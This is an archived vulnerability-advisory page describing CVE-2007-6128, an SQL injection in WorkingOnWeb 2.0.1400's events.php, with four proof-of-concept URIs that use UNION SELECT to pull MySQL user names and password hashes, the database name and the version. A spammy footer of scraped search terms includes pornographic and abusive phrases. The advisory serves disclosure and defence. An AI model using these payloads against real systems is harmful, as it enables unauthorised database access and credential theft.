about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , WorkingOnWeb Events.PHP SQL Injection Vulnerability


Title WorkingOnWeb Events.PHP SQL Injection Vulnerability
Published 2007-11-24-12:00AM
Updated 2007-12-18-08:04PM
Class Input Validation Error
CVE   CVE-2007-6128
Remote  Yes
Local  No
Credit  ka0x is credited with the discovery of this vulnerability.
Vulnerable  Flor de Utopia WorkingOnWeb 2.0.1400
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following proof-of-concept URIs are available:http://www.example.com/events.php?idevent=-1/**/union/**/select/**/concat(user,0x203a3a20,password),null,0,0,0,0,0,0,0/**/from/**/mysql.user/*
http://www.example.com/events.php?idevent=-1/**/union/**/select/**/user(),2,3,4,1,1,1,1,1/*
http://www.example.com/events.php?idevent=-1/**/union/**/select/**/database(),2,3,4,1,1,1,1,1/*
http://www.example.com/events.php?idevent=-1/**/union/**/select/**/version(),2,3,4,1,1,1,1,1/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 20:35:27 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Thirisa ba kl drivt Www.pak co FREE SEX X Vidio sex Crack Data 200 /compo IceWarp We Shakheela. gaytoons www.rapexx +www.emplo tnba www googel FUKING WOM sexvidiocl news for c myst gcgb php-nuke+2 C99shell news for C www.laoq.n mambo Remo vidsvi www.hanzhe www.bbmai. mod_ssl 2. news for c Apache h WWW.FREE S www.00546. hive www.saniya BOLLYWOOD php-nuke+a www.xing66 +www.emplo news for C your site www.za3ror Www.s& 200 /compo ip board 2 news for c www.cengdi nude pics php-nuke 2 tamil girl sex free m